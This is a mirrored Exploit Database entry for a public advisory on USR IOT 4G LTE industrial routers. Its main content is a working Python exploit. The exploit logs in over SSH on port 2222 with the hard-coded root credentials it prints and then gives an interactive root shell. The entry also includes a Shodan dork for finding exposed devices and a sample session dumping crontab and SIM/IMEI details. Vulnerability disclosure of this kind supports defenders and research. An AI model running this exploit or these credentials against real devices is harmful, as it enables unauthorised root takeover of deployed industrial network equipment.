USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 – Remote Root Backdoor

• Exploit Database
• 120 阅读

• 作者： LiquidWorm
  日期： 2022-05-11
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50894/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142

  # Exploit Title: USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor # Exploit Author: LiquidWorm   #!/usr/bin/env python3 # # # USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor # # # Vendor: Jinan USR IOT Technology Limited # Product web page: https://www.pusr.com | https://www.usriot.com # Affected version: 1.0.36 (USR-G800V2, USR-G806, USR-G807, USR-G808) # 1.2.7 (USR-LG220-L) # # Summary: USR-G806 is a industrial 4G wireless LTE router which provides # a solution for users to connect own device to 4G network via WiFi interface # or Ethernet interface. USR-G806 adopts high performance embedded CPU which # can support 580MHz working frequency and can be widely used in Smart Grid, # Smart Home, public bus and Vending machine for data transmission at high # speed. USR-G806 supports various functions such as APN card, VPN, WIFIDOG, # flow control and has many advantages including high reliability, simple # operation, reasonable price. USR-G806 supports WAN interface, LAN interface, # WLAN interface, 4G interface. USR-G806 provides various networking mode # to help user establish own network. # # Desc: The USR IOT industrial router is vulnerable to hard-coded credentials # within its Linux distribution image. These sets of credentials are never # exposed to the end-user and cannot be changed through any normal operation # of the device. The &apos;usr&apos; account with password &apos;www.usr.cn&apos; has the highest # privileges on the device. The password is also the default WLAN password. # Shodan Dork: title:"usr-*"// 4,648 ed ao 15042022 # # ------------------------------------------------------------------------- # lqwrm@metalgear:~$ python usriot_root.py 192.168.0.14 # # --Got rewt! # # id;id root;pwd # uid=0(usr) gid=0(usr) # uid=2(root) gid=2(root) groups=2(root) # /root # # crontab -l # */2 * * * * /etc/ltedial # */20 * * * * /etc/init.d/Net_4G_Check.sh # */15 * * * * /etc/test_log.sh # */120 * * * * /etc/pddns/pddns_start.sh start & # 44 4 * * * /etc/init.d/sysreboot.sh & # */5 * * * * ps | grep "/usr/sbin/ntpd"&& /etc/init.d/sysntpd stop; # 0 */4 * * * /etc/init.d/sysntpd start; sleep 40; /etc/init.d/sysntpd stop; # cat /tmp/usrlte_info # Local time is Fri Apr 15 05:38:56 2022 # (loop) # IMEI Number:8*************1 # Operator information:********Telecom # signal intensity:normal(20) # # Software version number:E*****************G # SIM Card CIMI number:4*************7 # SIM Card number:8******************6 # Short message service center number:"+8**********1" # system information:4G Mode # PDP protocol:"IPV4V6" # CREG:register # Check ME password:READY # base station information:"4**D","7*****B" # cat /tmp/usrlte_info_imsi # 4*************7 # # exit # # lqwrm@metalgear:~$ # ------------------------------------------------------------------------- # # Tested on: GNU/Linux 3.10.14 (mips) #OpenWrt/Linaro GCC 4.8-2014.04 #Ralink SoC MT7628 PCIe RC mode #BusyBox v1.22.1 #uhttpd #Lua # # # Vulnerability discovered by Gjoko &apos;LiquidWorm&apos; Krstic # @zeroscience # # # Advisory ID: ZSL-2022-5705 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5705.php # # # 10.04.2022 #     import paramiko as bah import sys as baaaaaah   bnr=&apos;&apos;&apos; ▄• ▄▌.▄▄ · ▄▄▄▪▄▄▄▄▄ █▪██▌▐█ ▀. ▀▄ █·██ ▪ •██ █▌▐█▌▄▀▀▀█▄▐▀▀▄ ▐█· ▄█▀▄▐█.▪ ▐█▄█▌▐█▄▪▐█▐█•█▌▐█▌▐█▌.▐▌ ▐█▌· ▄▄▄▄·▄▄▄·▀ ▄▄·▀▄ •▄ ·▄▄▄▄ ▀█▄▀▪ ▀▀▀▄▄▄ ▐█ ▀█▪▐█ ▀█ ▐█ ▌▪█▌▄▌▪██▪ ██ ▪ ▪ ▀▄ █· ▐█▀▀█▄▄█▀▀█ ██ ▄▄▐▀▀▄·▐█· ▐█▌ ▄█▀▄▄█▀▄ ▐▀▀▄ ██▄▪▐█▐█ ▪▐▌▐███▌▐█.█▌██. ██ ▐█▌.▐▌▐█▌.▐▌▐█•█▌ ·▀▀▀▀▀▀ ▄▄▄▀ ·▀▀▀▀▀▀▀• ▄▄▄▄▄▪ ▀█▄▀▪.▀▀ ▀▄ █·▪ ▪ •██ ▐▀▀▄▄█▀▄▄█▀▄▐█.▪ ▐█•█▌▐█▌.▐▌▐█▌.▐▌ ▐█▌· ▄▄▄·▀ ▄▄·▀█▄▄· ▄▄▄▀..▄▄▀· .▄▄ · ▐█ ▀█ ▐█ ▌▪▐█ ▌▪▀▄.▀·▐█ ▀. ▐█ ▀. ▄█▀▀█ ██ ▄▄██ ▄▄▐▀▀▪▄▄▀▀▀█▄▄▀▀▀█▄ ▐█ ▪▐▌▐███▌▐███▌▐█▄▄▌▐█▄▪▐█▐█▄▪▐█ ▀▀ ·▀▀▀ ·▀▀▀▀▀▀▀▀▀▀▀▀▀▀ &apos;&apos;&apos; print(bnr)   if len(baaaaaah.argv)<2: print(&apos;--Gief me an IP.&apos;) exit(0)   adrs=baaaaaah.argv[1] unme=&apos;usr&apos; pwrd=&apos;www.usr.cn&apos;   rsh=bah.SSHClient() rsh.set_missing_host_key_policy(bah.AutoAddPolicy()) try: rsh.connect(adrs,username=unme,password=pwrd,port=2222) #22 Ook. print(&apos;--Got rewt!&apos;) except: print(&apos;--Backdoor removed.&apos;) exit(-1)   while True: cmnd=input(&apos;# &apos;) if cmnd==&apos;exit&apos;: rsh.exec_command(&apos;exit&apos;) break stdin,stdout,stderr = rsh.exec_command(cmnd) print(stdout.read().decode().strip())   rsh.close()